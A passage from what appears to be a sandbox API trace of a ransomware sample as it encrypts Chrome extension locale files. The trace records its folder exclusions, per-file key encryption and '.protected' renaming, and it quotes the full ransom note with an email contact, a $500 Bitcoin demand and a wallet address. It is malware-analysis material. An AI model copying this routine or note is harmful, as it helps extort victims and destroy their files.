[0078.910] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.910] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.910] CloseHandle (hObject=0x164) returned 1 [0078.910] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0078.910] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0078.910] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned 141 [0078.910] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0078.910] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0078.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*") returned 143 [0078.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.910] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0078.910] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.910] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.910] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.910] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.910] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\.") returned 143 [0078.910] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.911] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.911] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.911] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.911] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.911] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.911] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\..") returned 144 [0078.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.911] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.911] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0078.911] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.911] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.911] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.911] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.911] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.911] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.911] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.912] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.912] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0078.912] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.912] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0078.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.913] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0078.913] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.913] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.913] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.913] CloseHandle (hObject=0x168) returned 1 [0078.914] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.protected") returned 165 [0078.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.protected")) returned 1 [0078.914] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.914] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.914] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0078.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.915] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.915] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.915] lstrlenA (lpString="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") returned 684 [0078.915] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.915] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.915] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.916] CloseHandle (hObject=0x164) returned 1 [0078.916] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0078.916] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0078.916] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned 141 [0078.916] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0078.916] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0078.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*") returned 143 [0078.916] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.916] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.916] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\.") returned 143 [0078.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.916] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.916] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.916] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.916] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.916] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.916] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\..") returned 144 [0078.917] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.917] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.917] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.917] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.917] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.917] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.917] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned 155 [0078.917] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.917] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0078.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.918] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcf, lpOverlapped=0x0) returned 1 [0078.918] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.918] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.919] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.919] CloseHandle (hObject=0x168) returned 1 [0078.919] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.protected") returned 165 [0078.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.protected")) returned 1 [0078.919] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.919] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.920] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0078.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.920] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.920] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.921] lstrlenA (lpString="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") returned 684 [0078.921] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.921] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.921] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.921] CloseHandle (hObject=0x164) returned 1 [0078.921] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0078.921] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0078.921] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned 141 [0078.921] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0078.921] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0078.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*") returned 143 [0078.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.921] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.921] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.922] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.922] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.922] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.922] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\.") returned 143 [0078.922] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.922] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.922] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.922] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.922] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.922] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.922] lstrcmpiW 